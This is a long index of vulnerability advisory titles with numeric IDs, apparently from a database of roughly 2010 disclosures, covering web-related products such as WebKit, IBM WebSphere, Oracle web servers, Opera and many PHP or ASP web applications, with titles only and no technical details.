[44956] WebKit WebSockets Integer Overflow Remote Code Execution Vulnerability
[44955] WebKit Edit Command Remote Code Execution Vulnerability
[44954] WebKit HTML 'Link' DNS Pre-Fetching Security Bypass Vulnerability
[44953] WebKit 'History' Object Same Origin Validation Bypass Vulnerability
[44952] WebKit Insufficient Entropy Random Number Generator Weakness
[44950] WebKit String Integer Overflow Remote Code Execution Vulnerability
[44931] WebRCSdiff 'viewver.php' Remote File Include Vulnerability
[44913] IBM WebSphere MQ FDC Processing Denial Of Service Vulnerability
[44888] openEngine 'website.php' Local File Include and Cross Site Scripting Vulnerabilities
[44875] IBM WebSphere Application Server Unspecified Cross Site Scripting Vulnerability
[44865] IBM WebSphere Commerce Unspecified SQL Injection Vulnerability
[44863] Webmatic 'p' Parameter SQL Injection Vulnerability
[44862] IBM WebSphere Application Server JAX-WS Denial Of Service Vulnerability
[44857] IBM WebSphere Portal 'SemanticTagService.js' Cross Site Scripting Vulnerability
[44783] QtWeb Browser Buffer Overflow Vulnerability
[44772] Ricoh Web Image Monitor Cross Site Scripting Vulnerability
[44771] WebM libvpx Unspecified Memory Corruption Vulnerability
[44770] Babylon Translation Interface Cross Domain Script Injection Vulnerability
[44765] WeBid Multiple Input Validation Vulnerabilities
[44670] IBM WebSphere Application Server CVE-2010-0783 Unspecified Cross Site Scripting Vulnerability
[44647] Webkit SVG Document CVE-2010-1822 Remote Denial of Service Vulnerability
[44632] Microsoft Forefront Unified Access Gateway Web Monitor Cross-Site Scripting Vulnerability
[44598] Webmedia Explorer HTML Injection Vulnerability
[44591] CMS WebManager-Pro Cross Site Scripting and SQL Injection Vulnerabilities
[44586] Mongoose Web Server URI Directory Traversal Vulnerability
[44546] Webradev Download Protect 'GLOBALS[RootPath]' Parameter Multiple Remote File Include Vulnerabilities
[44510] 212cafe WebBoard 'view.php' Directory Traversal Vulnerability
[44506] Weborf HTTP Request Denial Of Service Vulnerability
[44487] HP LoadRunner Web Tours Unspecified Denial of Service Vulnerability
[44479] HP Palm Pre webOS API Local Privilege Escalation Vulnerability
[44478] HP Palm webOS Camera Local Unauthorized Access Vulnerability
[44473] HP Palm Pre webOS Doc Viewer Remote Code Execution Vulnerability
[44468] Cisco CiscoWorks Common Services Web Server Module Buffer Overflow Vulnerability
[44388] WebAsys Shop-Script Pro 'current_currency' Parameter SQL Injection Vulnerability
[44371] WebEyes Guest Book 'yorum.asp' SQL Injection Vulnerability
[44368] WebCal 'webCal3_detail.asp' SQL Injection Vulnerability
[44342] IBM WebSphere MQ Subject Distinguished Name (DN) X.509 Certificate Spoofing Vulnerability
[44216] WebKit CVE-2010-3248 Unspecified Security Vulnerability
[44206] WebKit Images Cross Domain Information Disclosure Vulnerability
[44204] WebKit CVE-2010-3257 Stale Pointer Denial of Service Vulnerability
[44203] Webkit History Feature Address Bar URI Spoofing Vulnerability
[44201] WebKit Cast Operation CVE-2010-3114 Memory Corruption Vulnerability
[44200] WebKit MIME Type Handling CVE-2010-3116 Memory Corruption Vulnerability
[44199] WebKit SVG CVE-2010-3113 Memory Corruption Vulnerability
[44152] RETIRED: Wiki Web Help Insecure Cookie Authentication Bypass Vulnerability
[44139] AdaptWeb Local File Include and SQL Injection Vulnerabilities
[44123] Attachmate Reflection for the Web Cross Site Scripting Vulnerability
[44111] OpenConnect 'webvpn' Cookie Debugging Output Information Disclosure Vulnerability
[44040] Oracle Java SE and Java for Business CVE-2010-3550 Remote Java Web Start Vulnerability
[44034] Oracle Oracle iPlanet Web Server (Sun Java System Web Server) CVE-2010-3512 Remote Vulnerability
[44021] Oracle Java SE and Java for Business CVE-2010-3558 Remote Java Web Start Vulnerability
[44004] Oracle iPlanet Web Server CVE-2010-3514 Remote Security Vulnerability
[43984] Oracle iPlanet Web Server CVE-2010-3545 Administration Remote Vulnerability
[43977] Oracle iPlanet Web Server CVE-2010-3544 Administration Remote Vulnerability
[43968] Oracle Sun Convergence CVE-2010-3579 Webmail Remote Security Vulnerability
[43963] Oracle Communications Messaging Server CVE-2010-3564 Webmail Remote Vulnerability
[43931] Oracle WebLogic Server Node Manager UNC Path Remote Security Vulnerability
[43920] Opera Web Browser Prior to 10.63 Multiple Security Vulnerabilities
[43895] WebChess Multiple SQL Injection and Cross Site Scripting Vulnerabilities
[43880] WebNMS Framework 'ReportViewAction.do' Cross Site Scripting Vulnerability
[43875] IBM WebSphere Application Server Unspecified Cross Site Request Forgery Vulnerability
[43874] IBM WebSphere Application Server for z/OS Multiple Unspecified Cross Site Scripting Vulnerabilities
[43864] xWeblog 'tarih' Parameter SQL Injection Vulnerability
[43858] xWeblog 'makale_id' Parameter SQL Injection Vulnerability
[43854] Fretsweb Multiple SQL Injection Vulnerabilities
[43713] Uebimiau Webmail 'stage' Parameter Local File Include Vulnerability
[43679] SurgeMail SurgeWeb Cross Site Scripting Vulnerability
[43661] WebAsyst Shop-Script 'index.php' Cross Site Scripting Vulnerability
[43636] Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities
[43608] webSPELL SQL Injection and Open Email Relay Vulnerabilities
[43607] Opera Web Browser 10.62 and prior Multiple Security Vulnerabilities
[43580] webSPELL 'staticID' Parameter SQL Injection Vulnerability
[43579] webSPELL 'asearch.php' SQL Injection Vulnerability
[43576] webSPELL 'webspell_settings.php' SQL Injection Vulnerability
[43571] Fretsweb Multiple Local File Include Vulnerabilities
[43558] WebLeague 'profile.php' SQL Injection Vulnerability
[43557] WebLeague Multiple SQL Injection Vulnerabilities
[43547] WebAvail Aleza Portal 'alezalogin' Cookie Parameter SQL Injection Vulnerability
[43525] Tinx-IT WebVision 'news.php' SQL Injection Vulnerability
[43515] Horde IMP Webmail 'fetchmailprefs.php' HTML Injection Vulnerability
[43494] Web TV 'chn' Parameter Cross Site Scripting Vulnerability
[43475] FreeWebScriptz Freelancer Script Multiple Cross Site Scripting Vulnerabilities
[43474] FreeWebScriptz HUBScript 'single_winner1.php' Cross Site Scripting Vulnerability
[43429] WebShop Hun 'index.php' Local File Include and Cross Site Scripting Vulnerabilities
[43425] IBM WebSphere Application Server Administration Console Remote Denial Of Service Vulnerability
[43406] RSA Authentication Agent for Web Directory Traversal Vulnerability
[43380] WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross Site Scripting Vulnerability
[43356] Basic Web Server Directory Traversal and Denial of Service Vulnerabilities
[43339] Gonafish WebStatCaffe Multiple Cross Site Scripting Vulnerabilities
[43312] Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
[43254] Willscript Auction Website Script 'category.php' SQL Injection Vulnerability
[43245] Multi Website 'search' Parameter HTML Injection Vulnerability
[43243] Multi Website 'Browse' Parameter SQL Injection Vulnerability
[43230] Axigen Webmail Directory Traversal Vulnerability
[43220] IBM Lotus Sametime Connect Web Container Unspecified Vulnerability
[43156] YOPS (Your Own Personal [WEB] Server) Remote Buffer Overflow Vulnerability
[43149] WebAssist PowerStore 3 'Products_Results.php' Cross Site Scripting Vulnerability
[43083] WebKit for Apple iPhone/iPod touch Form Menus Memory Corruption Vulnerability
[43081] WebKit for Apple iPhone/iPod touch Prior to iOS 4.1 Remote Code Execution Vulnerability
[43079] WebKit for Apple iPhone/iPod touch Prior to iOS 4.1 Remote Code Execution Vulnerability
[43078] WebKit (CVE-2010-1813) HTML Objects Memory Corruption Vulnerability
[43077] WebKit for Apple iPhone/iPod Touch (CVE-2010-1781) Remote Code Execution Vulnerability
[43075] Apple iPhone/iPod touch User Interface Accessibility Security Vulnerability
[43049] WebKit Element Run-In Styling Use-After-Free Remote Code Execution Vulnerability
[43047] Webkit Floating Point Datatype Remote Code Execution Vulnerability
[43016] Weborf HTTP 'modURL()' Function Directory Traversal Vulnerability
[43003] Webformatique Reservation Manager 'index.php' Cross Site Scripting Vulnerability
[42951] CMS WebManager-Pro 'c.php' SQL Injection Vulnerability
[42844] Apple Safari 'webkit.dll' Invalid SGV Text Style Denial of Service Vulnerability
[42842] WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities
[42840] Wiccle Web Builder 'ajax.php' Cross Site Scripting Vulnerability
[42828] QtWeb Browser 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability
[42801] IBM WebSphere Application Server Web Services Time Stamp Unspecified Security Vulnerability
[42781] HotWeb Rentals 'details.asp' SQL Injection Vulnerability
[42767] Valarsoft WebMatic Multiple HTML Injection Vulnerabilities
[42700] GFI WebMonitor Configuration UI Arbitrary Script Injection Vulnerability
[42697] Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability
[42656] OXID eShop Administration Interface Security Bypass Vulnerability
[42633] Oracle MySQL 'HANDLER' interface Denial Of Service Vulnerability
[42620] Cisco WebEx ARF String Parsing Remote Code Execution Vulnerability
[42601] Opera Web Browser 10.61 Denial of Service Vulnerability
[42557] simplePHPWeb 'file.php' Authentication Bypass Vulnerability
[42500] WebKit CVE-2010-1386 Information Disclosure Vulnerability
[42494] WebKit (CVE-2010-1760) Unspecified Security Vulnerability
[42483] TT Web Site Manager 'index.php' SQL Injection Vulnerability
[42455] Joomla! 'com_weblinks' Component 'Itemid' Parameter SQL Injection Vulnerability
[42450] Open Handset Alliance Android Web Browser Remote Information Disclosure Vulnerability
[42447] Palm Pre webOS Remote Code Execution Vulnerability and Unspecified Vulnerabilities
[42407] Opera Web Browser prior to 10.61 Multiple Security Vulnerabilities
[42381] Webkit PDFs For TYPO3 SQL Injection Vulnerability and Remote Command Execution Vulnerability
[42293] RETIRED: Amlib NetOPAC 'webquery.dll' Stack Remote Buffer Overflow Vulnerability
[42281] IBM WebSphere Service Registry and Repository Multiple Cross Site Scripting Vulnerabilities
[42197] KWebKitPart 'webkitpart.cpp' Cross Site Scripting Vulnerability
[42193] Nokia QtDemoBrowser 'webview.cpp' Cross Site Scripting Vulnerability
[42155] PMSoftware Simple Web Server 'From:' Header Processing Remote Denial Of Service Vulnerability
[42153] D-Link WBR-2310 Web Server HTTP GET Request Remote Buffer Overflow Vulnerability
[42128] SUSE YaST WebYaST Appliance Pre-Installed Image Default Secret Key Security Bypass Vulnerability
[42087] KR - PHP Web Content Server 'krgourl.php' Remote File Include Vulnerability
[42049] WebKit 'font-face' and 'use' Elements Use-After-Free Remote Code Execution Vulnerability
[42048] WebKit JavaScript String Object Remote Heap Based Buffer Overflow Vulnerability
[42046] WebKit 'foreignObject' Elements Use-After-Free Remote Code Execution Vulnerability
[42045] WebKit JavaScript Array Signedness Error Remote Code Execution Vulnerability
[42044] WebKit Element Focus Use-After-Free Remote Code Execution Vulnerability
[42043] WebKit Just-In-Time Compiled JavaScript Stubs Remote Code Execution Vulnerability
[42042] WebKit Regular Expression Handling Remote Memory Corruption Vulnerability
[42041] WebKit 'use' Element Handling Remote Memory Corruption Vulnerability
[42038] WebKit CVE-2010-1787 Floating Elements Remote Memory Corruption Vulnerability
[42037] WebKit ':first-letter' and ':first-line' Pseudo-Elements Remote Memory Corruption Vulnerability
[42036] WebKit CSS Counters Remote Memory Corruption Vulnerability
[42035] WebKit CVE-2010-1783 Remote Memory Corruption Vulnerability
[42034] WebKit Inline Elements Remote Memory Corruption Vulnerability
[41966] Nessus Web Server Plugin Unspecified Cross Site Scripting Vulnerability
[41958] Apple Mac OS X WebDAV Kernel Extension Local Denial Of Service Vulnerability
[41895] Stratek Web Design Twilight CMS 'calendar' Cross Site Scripting Vulnerability
[41846] Cisco CDS Internet Streamer Web Server Directory Traversal Vulnerability
[41843] Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability
[41726] Gekko Web Builder 'index.php' Cross Site Scripting Vulnerability
[41714] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability
[41713] Novell GroupWise WebAccess Authentication Information Disclosure Vulnerability
[41712] Novell GroupWise WebAccess HTML Injection Vulnerability
[41711] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability
[41710] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability
[41707] Novell GroupWise WebAccess Proxy Feature Stack Buffer Overflow Vulnerability
[41706] Novell GroupWise Agents HTTP Interfaces Multiple Cross Site Scripting Vulnerabilities
[41705] Novell GroupWise Agents HTTP Interface HTTP Header Injection Vulnerability
[41669] Opera Web Browser CVE-2010-2659, CVE-2010-2662/63/64 Multiple Security Vulnerabilities
[41620] Oracle WebLogic Server Encoded URL Remote Vulnerability
[41618] Oracle Sun Java System Web Proxy Server CVE-2010-2385 Administration Server Remote Vulnerability
[41575] WebKit 'WebCore::toAlphabetic()' Memory Corruption Vulnerability
[41573] WebKit Geolocation Events Use After Free Memory Corruption Vulnerability
[41572] WebKit 'WebSocketHandshake::readServerHandshake()' Memory Corruption Vulnerability
[41571] Asterisk Recording Interface Multiple Vulnerabilities
[41559] NuralStorm Webmail Multiple Security Vulnerabilities
[41546] PHP-Nuke 'Web_Links' Module SQL Injection Vulnerability
[41526] Web Cocoon simpleCMS 'show.php' SQL Injection Vulnerability
[41462] Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
[41443] Vsftpd Webmin Module Multiple Unspecified Vulnerabilities
[41407] MediaWiki Login Interface Cross Site Request Forgery Vulnerability
[41375] BlackBerry 9700 Web Browser Unspecified Remote Denial of Service Vulnerability
[41372] WorksForWeb iLister 'action' Parameter Local File Include Vulnerability
[41365] BrotherScripts Recipe Website 'recipedetail.php' SQL Injection Vulnerability
[41344] Wiki Web Help 'getpage.php' SQL Injection Vulnerability
[41343] SaschArt SasCam Webcam Server ActiveX Control 'Head()' Method Buffer Overflow Vulnerability
[41312] Bugzilla 'data/webdot/' and '.bzr/' Information Disclosure Vulnerability
[41309] Wiki Web Help 'uploadimage.php' Arbitrary File Upload Vulnerability
[41306] Wiki Web Help Cross Site Scripting and HTML Injection Vulnerabilities
[41296] Trend Micro InterScan Web Security Virtual Appliance Multiple HTML Injection Vulnerabilities
[41288] ALPHA Ethernet Adapter II Web-Manager Security Bypass Vulnerability
[41284] Opera Web Browser prior to 10.60 Multiple Security Vulnerabilities
[41267] Free Web Script'z Online Games Login Multiple SQL Injection Vulnerabilities
[41266] Webgriffe Multimedia photoDiary 'install.php' Local File Include Vulnerability
[41263] Website Baker Multiple Security Vulnerabilities
[41253] Webmaster-Tips.net Flash Gallery for Joomla 'com_wmtpic' SQL Injection Vulnerability
[41246] WebDM CMS 'cont_form.php' SQL Injection Vulnerability
[41203] MetInfo enterprise website management system 'search.php' Cross Site Scripting Vulnerability
[41149] IBM WebSphere Application Server CVE-2010-0779 Cross Site Scripting Vulnerability
[41148] IBM WebSphere Application Server Console Unspecified Cross Site Scripting Vulnerability
[41125] WebKit (CVE-2010-1763) Unspecified Security Vulnerability
[41124] Lois Software WebDB Script Multiple SQL Injection Vulnerabilities
[41118] 2daybiz Web Template Software SQL Injection and Cross Site Scripting Vulnerabilities
[41091] IBM WebSphere Application Server for z/OS Administrative Console Cross Site Scripting Vulnerability
[41085] IBM WebSphere Application Server 'gzip' Data Null Pointer Exception Vulnerability
[41084] IBM WebSphere Application Server Unspecified Link Injection Security Vulnerability
[41083] VU Web Visitor Analyst 'redir.asp' Multiple SQL Injection Vulnerabilities
[41081] IBM WebSphere Application Server 'mod_ibm_ssl' HTTP Request Remote Denial Of Service Vulnerability
[41072] Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities
[41064] Weborf HTTP Header Processing Denial Of Service Vulnerability
[41054] WebKit Table Handling Remote Code Execution Vulnerability
[41053] WebKit 'JavaScriptCore' Page Transition Remote Code Execution Vulnerability
[41051] WebKit 'history.replaceState' Cross-Origin Information Disclosure Vulnerability
[41042] webConductor 'default.asp' SQL Injection Vulnerability
[41039] Trend Micro InterScan Web Security Virtual Appliance Cross Site Request Forgery Vulnerability
[41030] IBM WebSphere ILOG JRules Cross Site Scripting Vulnerability
[41028] Hitachi Groupmax World Wide Web Desktop Unspecified Cross Site Scripting Vulnerability
[40973] Opera Web Browser prior to 10.54 Multiple Security Vulnerabilities
[40965] H264 WebCam HTTP Server Buffer Overflow Vulnerability
[40927] Softwebs Nepal Real Estate 'viewphoto.asp' SQL Injection Vulnerability
[40895] Ruby WEBrick UTF-7 Encoding Cross Site Scripting Vulnerability
[40876] eWebquiz 'QuizType' Parameter SQL Injection Vulnerability
[40874] SasCam Webcam Server 'GET' Request Remote Denial Of Service Vulnerability
[40855] Joke Website Script 'search.php' Input Validation Vulnerability
[40815] LiteSpeed Web Server Source Code Information Disclosure Vulnerability
[40772] Miniweb 'module' Parameter Local File Include Vulnerability
[40763] Miniweb 'module' Parameter SQL Injection Vulnerability
[40756] WebKit ':visited' CSS Pseudo-class Information Disclosure Vulnerability
[40754] WebKit 'execCommand()' Function Clipboard Overwrite Security Weakness
[40753] WebKit Local Storage and Web SQL Database Directory Traversal Vulnerability
[40752] WebKit HTTP URI Clipboard Information Disclosure Vulnerability
[40750] WebKit HTTPS Redirect Information Disclosure Vulnerability
[40733] WebKit NTLM Credentials Information Disclosure Vulnerability
[40732] WebKit HTTP Redirects Information Disclosure Vulnerability
[40727] WebKit Cascading Stylesheets 'HREF' Information Disclosure Vulnerability
[40726] Webkit 'textarea' Element Cross-Site Scripting Vulnerability
[40717] WebKit Empty Hostname URI Handling Cross Site Scripting Vulnerability
[40714] WebKit SVG Image Pattern Cross Domain Security Bypass Vulnerability
[40710] WebKit 'frame.src' Validation Cross Site Scripting Vulnerability
[40707] Webkit DOM Constructor Object Cross Site Scripting Vulnerability
[40705] WebKit IRC Port Blacklist Information Disclosure Vulnerability
[40703] C3 Corp WebCalenderC3 Unspecified Local File Include Vulnerability
[40699] IBM WebSphere Application Server 'addNode.log' Information Disclosure Vulnerability
[40698] WebKit Keyboard Focus Cross Domain Information Disclosure Vulnerability
[40697] WebKit Integer Truncation TCP Port Information Disclosure Vulnerability
[40695] C3 Corp WebCalenderC3 Unspecified Cross Site Scripting Vulnerability
[40694] IBM WebSphere Application Server 'default_create.log' Information Disclosure Vulnerability
[40689] Computer Associates WebScan ActiveX Control Multiple Remote Code Execution Vulnerabilities
[40683] WebWiz Forum 'new_reply_form.asp' SQL Injection Vulnerability
[40675] Webkit HTML Document Fragments Cross Site Scripting Vulnerability
[40672] WebKit CSS-Styled HTML Handling Remote Code Execution Vulnerability
[40671] WebKit HTML Tables Remote Code Execution Vulnerability
[40670] WebKit Fonts Handling Remote Code Execution Vulnerability
[40669] Webkit UTF-7 Cross-Site Scripting Vulnerability
[40668] WebKit 'libxml' Context Handling Remote Code Execution Vulnerability
[40667] WebKit HTML Document Subtrees Remote Code Execution Vulnerability
[40666] WebKit 'removeChild' DOM Method Remote Code Execution Vulnerability
[40665] WebKit 'Node.normalize' Method Remote Code Execution Vulnerability
[40663] WebKit DOM Range Objects Remote Code Execution Vulnerability
[40662] WebKit Hover Event Handling Remote Code Execution Vulnerability
[40661] WebKit Use After Free Remote Code Execution Vulnerability
[40660] WebKit Dragging or Pasting Cross Domain Scripting Vulnerability
[40659] WebKit Custom Vertical Positioning Remote Code Execution Vulnerability
[40658] WebKit Caption Element Handling Remote Code Execution Vulnerability
[40657] WebKit SVG Remote Code Execution Vulnerability
[40656] WebKit SVG 'use' Element Remote Code Execution Vulnerability
[40655] WebKit 'first-letter' CSS Style Remote Code Execution Vulnerability
[40654] WebKit Option Recursive Use Element Remote Code Execution Vulnerability
[40653] WebKit IBM1147 Character Set Text Transform Remote Code Execution Vulnerability
[40652] WebKit SVG 'RadialGradient' Attribute Remote Code Execution Vulnerability
[40650] WebKit 'DOCUMENT_POSITION_DISCONNECTED' Attribute Remote Code Execution Vulnerability
[40649] WebKit 'ConditionEventListener' Remote Code Execution Vulnerability
[40647] WebKit Option Element 'ContentEditable' Attribute Remote Code Execution Vulnerability
[40646] WebKit Editable Containers Remote Code Execution Vulnerability
[40645] WebKit Marquee Event 'SelectionController' Remote Code Execution Vulnerability
[40644] WebKit HTML Button Use After Free Remote Code Execution Vulnerability
[40642] WebKit 'removeChild()' Remote Code Execution Vulnerability
[40637] HP OpenView Network Node Manager 'ovwebsnmpsrv.exe' Bad Option Stack Buffer Overflow Vulnerability
[40594] WebBiblio Subject Gateway System 'page' Parameter Local File Include Vulnerability
[40577] L2Web LineWeb Multiple Input Validation Vulnerabilities
[40575] Weborf HTTP Range Header Denial Of Service Vulnerability
[40514] Trend Micro Data Loss Prevention Web Chat Content Filtering Security Bypass Vulnerability
[40498] Accoria Rock Web Server Multiple Security Vulnerabilities
[40465] Websense 'Via' HTTP Header Web Filtering Security Bypass Vulnerability
[40425] osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability
[40378] 360 Web Manager 'webpages-form-led-edit.php' SQL Injection Vulnerability
[40362] RETIRED: WebAsyst 'blog_id' parameter SQL Injection Vulnerability
[40353] Webby HTTP GET Request Buffer Overflow Vulnerability
[40350] NITRO Web Gallery 'PictureId' Parameter SQL Injection Vulnerability
[40349] WebAsyst Shop-Script 'index.php' SQL Injection Vulnerability
[40342] Kingsoft Webshield 'KAVSafe.sys' Driver IOCTL Handling Local Privilege Escalation Vulnerability
[40325] IBM WebSphere Application Server Nodeagent/Deployment Manager Remote Denial Of Service Vulnerability
[40322] IBM WebSphere Application Server JAX-RPC WS-Security/JAX-WS Runtime Security Bypass Vulnerability
[40321] IBM WebSphere Application Server 'response.sendRedirect' Remote Denial Of Service Vulnerability
[40277] IBM WebSphere Application Server Long Filename Information Disclosure Vulnerability
[40264] Web 2.0 Social Network Freunde Community System 'user.php' SQL Injection Vulnerability
[40255] McAfee Email Gateway 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability
[40226] Hitachi Web Server SSL Certificate Revocation Security Bypass Vulnerability
[40225] WebJaxe 'administration.php' SQL Injection Vulnerability
[40223] Hitachi Web Server with SSL Enabled Remote Denial of Service Vulnerability
[40209] NettApp AS Webace CMS 'NewsId' Parameter SQL Injection Vulnerability
[40205] SpringSource tc Server JMX Interface Authentication Security Bypass Vulnerability
[40196] WebSAM DeploymentManager Denial of Service Vulnerability
[40133] MiniWebsvr URI Directory Traversal Vulnerability
[40113] Palo Alto Networks Firewall Interface 'editUser.esp' HTML Injection Vulnerability
[40092] Movable Type Administrative User Interface Cross Site Scripting Vulnerability
[40042] Hi Web Wiesbaden Shop System 'index.php' SQL Injection Vulnerability
[40035] Multiple Hi Web Wiesbaden Rueckwaerts Auktion System Products 'cafe.php' SQL Injection Vulnerability
[40021] Redatam+SP WebServer 'BASE' Parameter Cross Site Scripting Vulnerability
[39899] Eros Webkatalog 'start.php' SQL Injection Vulnerability
[39855] Opera Web Browser Asynchronous Document Modifications Remote Code Execution Vulnerability
[39837] IBM WebSphere MQ Unspecified Channel Control Data Remote Denial Of Service Vulnerability
[39825] Open Web Analytics Local and Remote File Include Vulnerabilities
[39780] Mini Web Server Cross Site Scripting and Directory Traversal Vulnerabilities
[39772] Memorial Web Site Script Insecure Cookie Authentication Bypass Vulnerability
[39770] WebMoney Advisor 'wmadvisor.dll' ActiveX Control Buffer Overflow Vulnerability
[39766] WebAsyst Shop-Script FREE Multiple SQL Injection Vulnerabilities
[39726] Webessence CMS SQL Injection and Arbitrary File Upload Vulnerabilities
[39716] Webessence CMS 'oembd.php' Cross-Site Scripting Vulnerability
[39701] IBM WebSphere Application Server SIP Logging Information Disclosure Vulnerability
[39689] NKInFoweb 'id_sp' Parameter SQL Injection Vulnerability
[39678] Palm WebOS SMS Script Injection Vulnerability
[39666] Tiny Java Web Server Multiple Input Validation Vulnerabilities
[39664] Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
[39617] Webessence CMS 'type' Parameter Cross-Site Scripting Vulnerability
[39567] IBM WebSphere Application Server 'resources.xml' Information Disclosure Vulnerability
[39474] Iomega Home Media Network Hard Drive 'smbwebclient.php' Authentication Bypass Vulnerability
[39472] Imperva SecureSphere Web Application Firewall and Database Firewall Security Bypass Vulnerability
[39447] Oracle Collaboration Suite CVE-2010-0881 Remote User Interface Components Vulnerability
[39342] Joomla! Webee Comments Component 'controller' Parameter Local File Include Vulnerability
[39306] IBM WebSphere Portal Login Unspecified Security Vulnerability
[39295] IBM WebSphere Application Server for z/OS Admin Console Unspecified Security Vulnerabilities
[39291] Apple Mac OS X Wiki Server Weblog SACL Security Bypass Vulnerability
[39280] FreePHPWebsiteSoftware 'default_theme.php' Remote File Include Vulnerability
[39257] Virata EmWeb URI Remote Denial Of Service Vulnerability
[39187] Sun Java System Web Server WebDAV Request Remote File Disclosure Vulnerability
[39182] uTorrent WebUI HTTP 'Authorization' Header Remote Denial of Service Vulnerability
[39178] webERPcustomer Component for Joomla! Local File Include Vulnerability
[39106] VMware WebAccess '/ui/vmDirect.do' Information Disclosure Vulnerability
[39105] VMware WebAccess JSON Cross-site Scripting Vulnerability
[39104] VMware WebAccess Virtual Machine Name Cross-site Scripting Vulnerability
[39103] VMware WebAccess URL Forwarding Vulnerability
[39095] Oracle Java SE and Java for Business CVE-2010-0089 Remote Java Web Start Vulnerability
[39091] Oracle Java SE and Java for Business CVE-2010-0090 Remote Java Web Start Vulnerability
[39056] IBM WebSphere Application Server Orb Client Remote Denial Of Service Vulnerability
[39051] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability
[39042] Linux Kernel USB interface Local Information Disclosure Vulnerability
[39038] Fuctweb CapCC Plugin for WordPress 'plugins.php' SQL Injection Vulnerability
[39037] RETIRED: VMware WebAccess Multiple Vulnerabilities
[39034] Eros Erotik Webkatalog 'start.php' SQL Injection Vulnerability
[39032] Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability
[39011] IBM WEBi Multiple Unspecified Cross Site Scripting Vulnerabilities
[38994] Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability
[38993] WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
[38967] WeBAM Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability
[38934] Cisco IOS H.323 Interface Memory Leak Remote Denial of Service Vulnerability
[38931] Cisco IOS H.323 Interface Queue Resource Exhaustion Denial of Service Vulnerability
[38892] Opera Web Browser XSLT Cross-Domain Information Disclosure Vulnerability
[38874] Webmatic HTML Injection and Cross-Site Scripting Vulnerabilities
[38833] IBM DB2 Content Manager Web Services Unspecified Vulnerability
[38791] Embedthis Appweb 'waitCallback()' Remote Denial Of Service Vulnerability
[38692] WebKit Cross-Origin Stylesheet Request Information Disclosure Vulnerability
[38691] WebKit HTML Image Element Handling Memory Corruption Vulnerability
[38690] WebKit CSS 'run-in' Display Use-After-Free Error Remote Code Execution Vulnerability
[38689] WebKit Right-to-Left Displayed Text Handling Memory Corruption Vulnerability
[38688] WebKit XML Document Parsing Memory Corruption Vulnerability
[38687] WebKit Object Element Fallback Memory Corruption Vulnerability
[38686] WebKit HTML Elements Callback Use-After-Free Error Remote Code Execution Vulnerability
[38685] WebKit Nested HTML Tags Use-After-Free Error Remote Code Execution Vulnerability
[38684] WebKit CSS 'format()' Arguments Memory Corruption Vulnerability
[38670] lukeonweb.net MRW PHP Upload 'upload.html' Remote File Upload Vulnerability
[38595] Perforce P4Web Weak Session Cookie Session Hijacking Vulnerability
[38589] Perforce P4Web Hidden Control Security Bypass Vulnerability
[38573] Spectrum Software WebManager CMS 'pojam' Parameter Cross Site Scripting Vulnerability
[38541] Emweb Wt Multiple Cross Site Scripting and Unspecified Security Vulnerabilities
[38519] Opera Web Browser 'Content-Length' Header Integer Overflow Vulnerability
[38459] IBM Domino Web Access Prior to 229.281 Unspecified Security Vulnerabilities
[38457] Domino Web Access ActiveX Control URL Handling Buffer Overflow Vulnerability
[38434] Website Baker 'framework/class.wb.php' Security Bypass Vulnerability
[38416] JSK Internet WebAdministrator 'download.php' SQL Injection Vulnerability
[38398] WebKit Style Tag Remote Denial of Service Vulnerability
[38375] WebKit 'window.open()' method Cross Domain Scripting Vulnerability
[38374] WebKit Image Decoder Memory Allocation Remote Code Execution Vulnerability
[38373] WebKit Popup Blocker Security Bypass Vulnerability
[38372] WebKit 'file:///' Directory Listing Page Information Disclosure Vulnerability
[38360] IBM WebSphere Portal Portlet Palette Search HTML Injection Vulnerability
[38333] Infragistics NetAdvantage for Web Client Directory Traversal Vulnerability
[38332] IBM WebSphere Service Registry and Repository Configuration Property Security Bypass
[38329] Social Web CMS 'index.php' Cross Site Scripting Vulnerability
[38328] IBM WebSphere Commerce Local Information Disclosure Vulnerability
[38327] IBM WebSphere Commerce Encryption Key Remote Security Vulnerability
[38317] LiteSpeed Web Server Cross Site Scripting and Request Forgery Vulnerabilities
[38285] Mozilla Firefox and SeaMonkey Web Workers Array Data Type Remote Memory Corruption Vulnerability
[38280] Cisco ASA 5500 WebVPN DTLS Packet Denial of Service Vulnerability
[38258] Joomla! Webamoeba Ticket System Component HTML-Injection Vulnerability
[38212] Squid Web Proxy Cache HTCP Request Processing Remote Denial of Service Vulnerability
[38207] RSA SecurID WebID Cross Site Scripting Vulnerability
[38204] Joomla! Webee Component SQL Injection and HTML Injection Vulnerabilities
[38181] SAP WebDynpro Runtime Unspecified HTML Injection Vulnerability
[38170] Cisco IronPort Encryption Appliance WebSafe Servlet Information Disclosure Vulnerability
[38168] Cisco IronPort Encryption Appliance Administration Interface Information Disclosure Vulnerability
[38143] JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability
[38141] GeFest Web Home Server Remote Directory Traversal Vulnerability
[38122] IBM WebSphere Application Server 'Requires SSL' Option Security Bypass Vulnerability
[38070] Zeus Web Server Unspecified Cross Site Scripting Vulnerability
[38053] WebCalendar Multiple Cross Site Scripting Vulnerabilities
[37955] South River Technologies WebDrive Security Descriptor Local Privilege Escalation Vulnerability
[37926] Oracle WebLogic Server Node Manager 'beasvc.exe' Remote Command Execution Vulnerability
